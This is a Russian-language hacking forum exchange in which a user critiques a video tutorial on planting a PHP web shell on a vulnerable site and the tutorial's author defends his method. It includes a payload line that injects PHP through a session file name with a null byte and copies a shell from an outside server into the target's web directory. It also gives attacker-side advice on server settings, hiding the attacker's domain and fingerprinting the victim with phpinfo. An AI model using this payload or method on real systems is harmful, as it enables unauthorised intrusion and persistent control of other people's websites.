Но. Полчаса лить шелл, это что-то. На середине видео я уже еле сдерживался, чтоб не закрыть плеер и не пойти критиковат
носит учебный характер, разжевывалось каждое движение
Во-первых, зачем ты в опере смотришь куки ТАКИМ образом? Это дико тормозно и медленно, проще жать ПКМ -> настройки для сайта -> Cookie (таким образом, опера не читают куки всех доменов, а только домена, на котором ты находишься сейчас.)
согласен
Во-вторых, magic quotes on там - но в скрипте скорей всего просто stripslashes делается, так что ничего странного нет.
Не обязательно, просто так же в скрипте можно отключить маджики или через .htaccess в данной конкретной папке
В-третьих, зачем вводить cmd переменную? Тем более проверять ее существование isset-ом (ты же не будешь сначала пустой запрос слать, а сразу с кодом твоим). Эта переменная не нужна там совершенно, можно было банально сделать:
Цитата:
sess_[номер сессии]%00<?php copy('http://server.com/shell.txt', '../media/z.php');?>
И по этой причине html-форму какую-то выдумывать и через нее аплоадить шелл не пришлось бы.
1. Зависишь от alloq_url_fopen=ON
2. Зависишь от magic_quotes=ON
3. Палишь домен
4. Зависишь от качества соединения со своим доменом - что лучше, загрузить со своего компа сразу или откуда-то?
Именно для это и продемонстрирован практически универсальный способ при фактически любых ограничениях
phpinfo и абсолютный путь смотреть тоже, в принципе не обязательно было.
Имхо, асболютно не соглашусь, прежде чем лечить, надо дать диагноз виктуму:
1. Просто проверяем, что php-код исполняется
2. Узнаем не только абсолютный путь, но и много другой важной и полезной информации (тот же allow_url_fopen=on, кхм + запрещенные функции и т.д.)
PS: Я не полчаса лил шелл, а полчаса снимал видео, как это можно сделать, с подробными объяснениями каждого шага, не рассчитано на опытных, хотя и некоторые из них, судя по посту выше, половины своих действий/бездействий просто не понимают